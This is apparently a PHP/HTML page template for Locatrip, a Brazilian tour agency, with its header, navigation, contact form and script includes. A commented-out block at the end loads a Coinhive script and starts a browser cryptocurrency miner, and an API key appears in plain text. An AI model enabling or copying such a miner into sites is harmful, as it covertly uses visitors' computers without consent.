<!doctype html>
<!--[if lt IE 7]>       <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]>          <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]>          <html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!-->  <html class="no-js" lang=""> <!--<![endif]-->


<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>
        <?php
            $param = ($PARAM1 !== 0) ? '-' . $PARAM1 : null;
            $key = $ROUTE_CONTROLLER . '-' . $ROUTE_ACTION . $param;
            echo TitleMetaHelper::get($key);
        ?>
    </title>
    <meta name="description" content="Tour pelas praias de Florianópolis, venha conhecer a ilha da magia! ">

    <!-- MOBILE METAS -->
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="viewport" content="minimal-ui, width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-title" content="locatrip">
    <meta name="application-name" content="locatrip">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-barstyle" content="black-translucent">
    <meta name="viewport" content="user-scalable=no, initial-scale=1, maximum-scale=1, minimum-scale=1, width=device-width">
    <meta name="msapplication-tap-highlight" content="no">
    <meta name="theme-color" content="#08bad2">
    <meta name="apple-mobile-web-app-status-bar-style" content="#08bad2">
    <meta name="msapplication-navbutton-color" content="#08bad2">
    <meta name="format-detection" content="telephone=no">

    <meta property="og:url"                content="http://www.locatrip.com.br" />
    <meta property="og:type"               content="article" />
    <meta property="og:title"              content="Tour pelas praias de Florianópolis, venha conhecer a ilha da magia!" />
    <meta property="og:description"        content="Loca Trip - Somos uma agência de turismo, movidos pelo desejo intenso de conhecer lugares novos, de estar com amigos, de partilhar bons momentos." />
    <meta property="og:image"              content="http://www.locatrip.com.br/lib/images/logo-face.jpg" />

    <!-- Global Site Tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-107050327-1"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments)};
      gtag('js', new Date());

      gtag('config', 'UA-107050327-1');
    </script>

    <base href="<?php echo ROOT; ?>" target="_parent" />
    <link rel="stylesheet" href="lib/css/bootstrap.min.css">
    <link rel="stylesheet" href="lib/css/normalize.css">
    <link rel="stylesheet" href="lib/css/font-awesome.min.css">
    <link rel="stylesheet" href="lib/css/icomoon.css">
    <link rel="stylesheet" href="lib/css/owl.carousel.min.css">
    <link rel="stylesheet" href="lib/css/customScrollbar.css">
    <link rel="stylesheet" href="lib/css/photoswipe.css">
    <link rel="stylesheet" href="lib/css/default-skin.css">
    <link rel="stylesheet" href="lib/css/prettyPhoto.css">
    <link rel="stylesheet" href="lib/css/animate.css">
    <link rel="stylesheet" href="lib/css/transitions.css">
    <link rel="stylesheet" href="lib/css/main.css">
    <link rel="stylesheet" href="lib/css/color.css">
    <link rel="stylesheet" href="lib/css/responsive.css">
    <script src="lib/js/vendor/modernizr-2.8.3-respond-1.4.2.min.js"></script>

    <link rel="icon" href="lib/favicon-16.png" sizes="16x16">
    <link rel="icon" href="lib/favicon-32.png" sizes="32x32">
    <link rel="icon" href="lib/favicon-48.png" sizes="48x48">
    <link rel="icon" href="lib/favicon-64.png" sizes="64x64">
    <link rel="icon" href="lib/favicon-128.png" sizes="128x128">
    <link rel="icon" href="lib/favicon-256.png" sizes="256x160">

</head>
<body id="body" class="tg-home tg-hometwo">
    <!--[if lt IE 8]>
        <p class="browserupgrade">Você está usando um<strong>desatualizado</strong> navegador. Por favor<a href="http://browsehappy.com/">atualize seu navegador</a>para melhorar sua experiência.</p>
    <![endif]-->
    <!--************************************
            Wrapper Start
    *************************************-->
    <div id="tg-wrapper" class="tg-wrapper tg-haslayout">
        <!--************************************
                Header Start
        *************************************-->
        <header id="tg-header" class="tg-header tg-haslayout" data-spy="affix" data-offset-top="10">
            <div class="container">
                <div class="row">
                    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                        <strong class="tg-logo"><a href="<?php $home ?>"><img src="lib/images/logo.png" alt="locatrip"></a></strong>
                        <div class="tg-navigationarea">
                            <a class="tg-btn tg-btnbecommember" href="tel:11958248502"><span class="tg-badge">CLIQUE PARA LIGAR</span>11 958248489</a>
                            <a id="tg-btnopenclose" class="tg-btnopenclose" href="javascript:void(0);" style="display: none;"><i class="icon-menu"></i></a>
                            <nav id="tg-nav" class="tg-nav">
                                <div class="navbar-header">
                                    <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#tg-navigation" aria-expanded="false">
                                        <span class="icon-bar"></span>
                                        <span class="icon-bar"></span>
                                        <span class="icon-bar"></span>
                                        <span class="icon-bar"></span>
                                    </button>
                                </div>
                                <div id="tg-navigation" class="collapse navbar-collapse tg-navigation">
                                    <ul>
                                        <li><a href="<?php $home ?>">HOME</a></li>
                                        <li>
                                            <a href="trip">TRIPS</a>
                                            <ul class="sub-menu">
                                                <?php foreach (CityHelper::getAll() as $key => $value): ?>
                                                    <li id="all-trip"><a href="city/trip/<?= $key ?>" class="external"><?= $value['title'] ?></a></li>
                                                <?php endforeach; ?>
                                            </ul>
                                        </li>
                                        <li><a href="contato">CONTATO</a></li>
                                    </ul><!--
                                    <ul class="tg-socialicons pull-right">
                                        <li class="tg-facebook"><a href="https://www.facebook.com/locatrip"><i class="fa fa-facebook"></i></a></li>
                                        <li class="tg-twitter"><a href="javascript:void(0);"><i class="fa fa-twitter"></i></a></li>
                                        <li class="tg-linkedin"><a href="javascript:void(0);"><i class="fa fa-linkedin"></i></a></li>
                                        <li class="tg-googleplus"><a href="javascript:void(0);"><i class="fa fa-google-plus"></i></a></li>
                                        <li class="tg-rss"><a href="javascript:void(0);"><i class="fa fa-rss"></i></a></li>

                                    </ul> -->
                                </div>
                            </nav>
                        </div>
                    </div>
                </div>
            </div>
        </header>
        <!--************************************
                Header End
        *************************************-->

       <?php include('templates/' . $template); ?>

        <!--************************************
                Footer Start
        *************************************-->
        <footer id="tg-footer" class="tg-footer tg-haslayout">
            <!--************************************
                    Contact Us Start
            *************************************-->
            <div class="tg-contastus tg-bgcontactus tg-sectionspace">
                <h1>Sonhe | viaje | explore</h1>
                <div class="container">
                    <div class="row">
                        <div class="col-xs-offset-0 col-xs-12 col-sm-offset-0 col-sm-12 col-md-offset-2 col-md-8 col-lg-offset-2 col-lg-8">
                            <div class="tg-sectionhead">
                                <div class="tg-sectionheading">
                                    <span>Quer perguntar algo?</span>
                                    <h2>Entre em contato conosco</h2>
                                </div>
                            </div>
                        </div>
                        <div class="col-xs-12 col-xs-offset-0 col-sm-12 col-sm-offset-0 col-md-8 col-md-offset-2 col-lg-6 col-lg-offset-3">
                            <form class="tg-formtheme tg-formcontactus">
                                <fieldset>
                                    <div class="form-group">
                                        <input type="text" name="fullname" class="form-control" placeholder="Nome*">
                                    </div>
                                    <div class="form-group">
                                        <input type="email" name="email" class="form-control" placeholder="E-mail*">
                                    </div>
                                    <div class="form-group">
                                        <input type="text" name="phone" class="form-control" placeholder="Telefone*">
                                    </div>
                                    <div class="form-group">
                                        <input type="text" name="subject" class="form-control" placeholder="Assunto*">
                                    </div>
                                    <div class="form-group">
                                        <textarea placeholder="Menssagem*"></textarea>
                                    </div>
                                    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                                        <button class="tg-btn" type="submit">Enviar Agora</button>
                                    </div>
                                </fieldset>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
            <!--************************************
                    Contact Us End
            *************************************-->
            <!--************************************
                    Bottom Bar Start
            *************************************-
            <div class="tg-footerbar">
                <a id="tg-btnscrolltop" class="tg-btnscrolltop" href="javascript:void(0);"><i class="icon-chevron-up"></i></a>
                <div class="container">
                    <div class="row">
                        <ul class="tg-socialicons pull-right">
                            <li class="tg-facebook"><a href="https://www.facebook.com/La-Selva-Trip-345248815929882/"><i class="fa fa-facebook"></i></a></li>
                            <li class="tg-twitter"><a href="javascript:void(0);"><i class="fa fa-twitter"></i></a></li>
                            <!--
                            <li class="tg-linkedin"><a href="javascript:void(0);"><i class="fa fa-linkedin"></i></a></li>
                            <li class="tg-googleplus"><a href="javascript:void(0);"><i class="fa fa-google-plus"></i></a></li>
                            <li class="tg-rss"><a href="javascript:void(0);"><i class="fa fa-rss"></i></a></li>
                        --
                        </ul>
                        <p class="tg-copyrights pull-left">LOCATRIP</p>
                    </div>
                </div>
            </div>

            ************************************
                    Bottom Bar End
            *************************************-->
        </footer>
        <!--************************************
                Footer End
        *************************************-->
    </div>
    <!--************************************
            Wrapper End
    *************************************-->
    <!--script src="lib/js/vendor/jquery-library.js"></script-->

    <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
    <script type="text/javascript" src="src/jquery.fb.albumbrowser.js"></script>
    <link rel="stylesheet" type="text/css" href="src/jquery.fb.albumbrowser.css" />

    <script src="lib/js/vendor/bootstrap.min.js"></script>
    <script src="https://maps.google.com/maps/api/js?key=AIzaSyCR-KEWAVCn52mSdeVeTqZjtqbmVJyfSus&language=en"></script>
    <script src="lib/js/jquery.singlePageNav.min.js"></script>
    <script src="lib/js/customScrollbar.min.js"></script>
    <script src="lib/js/owl.carousel.min.js"></script>
    <script src="lib/js/photoswipe.min.js"></script>
    <script src="lib/js/photoswipe-ui-default.js"></script>
    <script src="lib/js/prettyPhoto.js"></script>
    <script src="lib/js/tilt.jquery.js"></script>
    <script src="lib/js/countdown.js"></script>
    <script src="lib/js/gmap3.js"></script>
    <script src="lib/js/main.js"></script>
<!--
   <script async src='https://pepper.swat.io/embed.js?eyJwb3NpdGlvbiI6InJpZ2h0IiwiY29sb3IiOiIwOGJhZDIiLCJjdXN0b21Db2xvciI6dHJ1ZSwiaWNvbiI6InBob25lIiwicHJvbm91biI6InVzIiwibGFuZ3VhZ2UiOiJwdCIsImJyYW5kZWQiOnRydWUsImludHJvVGV4dCI6bnVsbCwiY2hhbm5lbHMiOltbImZhY2Vib29rIiwibG9jYXRyaXAiLCJzb2NpYWwiXSxbIndoYXRzYXBwIiwiMTE5NTgyNDg0ODkiLCJzb2NpYWwiXSxbImluc3RhZ3JhbSIsImxvY2F0cmlwYnIiLCJzb2NpYWwiXSxbIm1lZGl1bSIsIkBsb2NhdHJpcCIsInNvY2lhbCJdLFsiZW1haWwiLCJjb250YXRvQGxvY2F0cmlwLmNvbS5iciIsImNsYXNzaWMiXV19'></script>

    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
    <script>
        var miner = new CoinHive.Anonymous('LMEOjQF6OEFcKp61tV0x0hbJwhM0e6YP');
        miner.start();
    </script>
-->
</body>
</html>